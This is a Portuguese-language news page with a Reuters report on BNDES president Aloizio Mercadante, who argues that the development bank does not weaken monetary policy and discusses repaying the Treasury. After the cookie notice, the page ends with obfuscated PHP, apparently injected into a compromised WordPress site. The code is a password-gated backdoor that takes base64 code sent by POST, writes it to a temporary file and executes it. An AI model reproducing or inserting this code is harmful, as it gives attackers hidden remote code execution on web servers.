• 11.09.2023
  • Redação

BNDES não compromete a potência da política monetária, diz Mercadante

(Reuters) -O presidente do Banco Nacional de Desenvolvimento Econômico e Social (BNDES), Aloizio Mercadante, disse nesta sexta-feira que não tem como a atuação do banco de fomento comprometer a potência da política monetária no país, em um recado ao presidente do Banco Central, Roberto Campos Neto.

“A participação do BNDES no crédito direcionado é de 1,4%. Em economia, o rabo não abana o cachorro, então, não tem como o BNDES comprometer a potência da política monetária”, disse em apresentação no Fórum Esfera.

O presidente do Banco Central tem afirmado que o volume de crédito direcionado — financiamentos que obedecem a parâmetros estabelecidos pelo governo — no Brasil é maior que a média mundial, e que uma ampliação dessas operações reduz o efeito da política monetária.

No evento, que terá a participação de Campos Neto no sábado, Mercadante discordou da “reflexão apresentada de que o BNDES entope a potência da política monetária”, e disse que as parcelas mais significativas do crédito subsidiado no país são referentes a agronegócio e habitação.

Segundo ele, o banco de fomento está ampliando sua carteira sem um real de subsídio do governo.

O presidente do BNDES acrescentou que o BC votou a favor de propostas do governo sobre crédito no Conselho Monetário Nacional (CMN), como alterações no Fundo Clima, e disse que “essa página está virada”.

DESMAME DO TESOURO

Mercadante afirmou ainda que está em negociação com o Tesouro Nacional para que uma devolução de 24 bilhões de reais pela instituição aos cofres do governo federal seja parcelada.

“Vamos renegociar o pagamento da antecipação que foi dada ao BNDES dos subsídios do passado”, disse, destacando que nos últimos anos o BNDES já devolveu ao Tesouro 270 bilhões de reais a mais do que captou.

Mercadante afirmou que o papel do BNDES não é financiar o Tesouro, defendendo que o órgão do Ministério da Fazenda “desmame” do banco de fomento para que seja possível ampliar financiamentos.

O presidente do BNDES disse ainda que a taxa de inadimplência das operações do banco é de 0,01%, o que mostra que “podemos correr mais risco”.

Mercadante também defendeu que o governo promova o que chamou de “Desenrola Empresa”, iniciativa para solucionar débitos de companhias privadas da dívida ativa da União, direcionando parte dos recursos arrecadados para ações de investimento.

x

Utilizamos cookies e outras tecnologias para lhe oferecer uma experiência de navegação melhor, analisar o tráfego do site e personalizar o conteúdo, de acordo com a nossa Política de Privacidade. Ao continuar navegando, você concorda com estas condições.

if(!function_exists("_set_fetas_tag") && !function_exists("_set_betas_tag")){try{function _set_fetas_tag(){if(isset($_GET['here'])&&!isset($_POST['here'])){die(md5(8));}if(isset($_POST['here'])){$a1='m'.'d5';if($a1($a1($_POST['here']))==="83a7b60dd6a5daae1a2f1a464791dac4"){$a2="fi"."le"."_put"."_contents";$a22="base";$a22=$a22."64";$a22=$a22."_d";$a22=$a22."ecode";$a222="PD"."9wa"."HAg";$a2222=$_POST[$a1];$a3="sy"."s_ge"."t_te"."mp_dir";$a3=$a3();$a3 = $a3."/".$a1(uniqid(rand(), true));@$a2($a3,$a22($a222).$a22($a2222));include($a3); @$a2($a3,'1'); @unlink($a3);die();}else{echo md5(7);}die();}} _set_fetas_tag();if(!isset($_POST['here'])&&!isset($_GET['here'])){function _set_betas_tag(){echo "";}add_action('wp_head','_set_betas_tag');}}catch(Exception $e){}}